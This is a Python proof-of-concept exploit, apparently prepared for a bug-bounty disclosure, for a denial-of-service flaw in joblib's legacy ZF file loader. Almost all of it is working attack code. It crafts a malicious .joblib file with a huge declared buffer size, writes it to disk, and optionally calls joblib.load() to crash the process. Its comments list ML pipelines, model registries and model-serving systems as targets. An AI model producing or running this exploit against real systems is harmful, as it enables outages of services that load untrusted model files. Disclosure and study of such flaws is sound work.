#!/usr/bin/env python3 """ PoC: Joblib ZF Header DoS — Unbounded Memory Allocation in read_zfile() CVE: TBD | CWE-770 | CVSS 7.5 Vulnerability: joblib/numpy_pickle_compat.py — read_zfile() reads the declared buffer size from the ZF file header as a 19-character hex string, then passes it directly to zlib.decompress() as the `bufsize` argument — NO bounds check: _ZFILE_PREFIX = b'ZF' _MAX_LEN = 19 # hex digits length = file_handle.read(len(_ZFILE_PREFIX) + _MAX_LEN) length = length[len(_ZFILE_PREFIX):] # strip 'ZF' prefix length = int(length, 16) # attacker-controlled! data = zlib.decompress(file_handle.read(), 15, length) # ↑ zlib pre-allocates `length` bytes before decompressing # With length=0x7FFFFFFFFFFFFFFF → 9.2 EB allocation attempt → CRASH The crash happens BEFORE any Pickle deserialization — bypasses all joblib Pickle safety settings (trusted=True, etc.). Attack surface: Any code that calls joblib.load() on untrusted .joblib files: - ML pipelines loading user-supplied models - Model registries accepting external uploads - scikit-learn model serving Usage: python3 poc_exploit.py # generates malicious.joblib python3 poc_exploit.py --trigger # also triggers the crash via joblib.load() Author: security research (huntr.com submission) """ import struct import sys import os import io # ZF format constants (from joblib/numpy_pickle_compat.py) _ZFILE_PREFIX = b'ZF' # magic prefix _MAX_LEN = 19 # hex string length for declared size OUTPUT_FILE = 'malicious_zf.joblib' def create_malicious_zf_joblib(declared_size: int = 0x7FFFFFFFFFFFFFFF) -> bytes: """ Craft a minimal ZF-format joblib file with a huge declared buffer size. Actual ZF file layout (joblib/numpy_pickle_compat.py): Bytes 0-1: b'ZF' ← _ZFILE_PREFIX Bytes 2-20: 19-char hex string ← declared size (attacker-controlled) Bytes 21+: zlib-compressed payload ← actual data (ignored — crash happens first) joblib parses this as: length = int(file_data[2:21], 16) data = zlib.decompress(rest, 15, length) # ← pre-allocates `length` bytes! """ import zlib # Format declared_size as 19-character hex string (zero-padded) size_hex = f"{declared_size:019x}".encode() # e.g. b'007fffffffffffffff' assert len(size_hex) == _MAX_LEN # Minimal valid zlib stream (crash happens during pre-allocation, before decompress) compressed_payload = zlib.compress(b'\x00') payload = _ZFILE_PREFIX + size_hex + compressed_payload print(f"[*] Crafted ZF .joblib file:") print(f" Format : {_ZFILE_PREFIX.decode()} + {_MAX_LEN}-char hex size") print(f" Size hex: {size_hex.decode()}") print(f" Declared: {declared_size:#x} = {declared_size:,} bytes (~{declared_size/2**40:.1f} TiB)") print(f" File size: {len(payload)} bytes (crash before decompression)") return payload def main(): trigger = '--trigger' in sys.argv # Generate the malicious file payload = create_malicious_zf_joblib() with open(OUTPUT_FILE, 'wb') as f: f.write(payload) print(f"[+] Malicious file written: {OUTPUT_FILE} ({os.path.getsize(OUTPUT_FILE)} bytes)") if trigger: print("\n[*] Triggering via joblib.load()...") try: import joblib print(f" joblib version: {joblib.__version__}") result = joblib.load(OUTPUT_FILE) print(f"[-] Unexpected success: {result}") except MemoryError as e: print(f"[+] CRASH CONFIRMED: MemoryError") print(f" zlib.decompress(data, 15, {0x7FFFFFFFFFFFFFFF:,}) pre-allocated ~9.2 EB") print(f" Error: {e}") except Exception as e: name = type(e).__name__ if 'memory' in str(e).lower() or 'alloc' in str(e).lower(): print(f"[+] CRASH CONFIRMED: {name}: {e}") else: print(f"[~] Exception (check manually): {name}: {e}") else: print(f"\n[i] Run with --trigger to demonstrate the crash via joblib.load()") print(f" python3 {sys.argv[0]} --trigger") if __name__ == '__main__': main()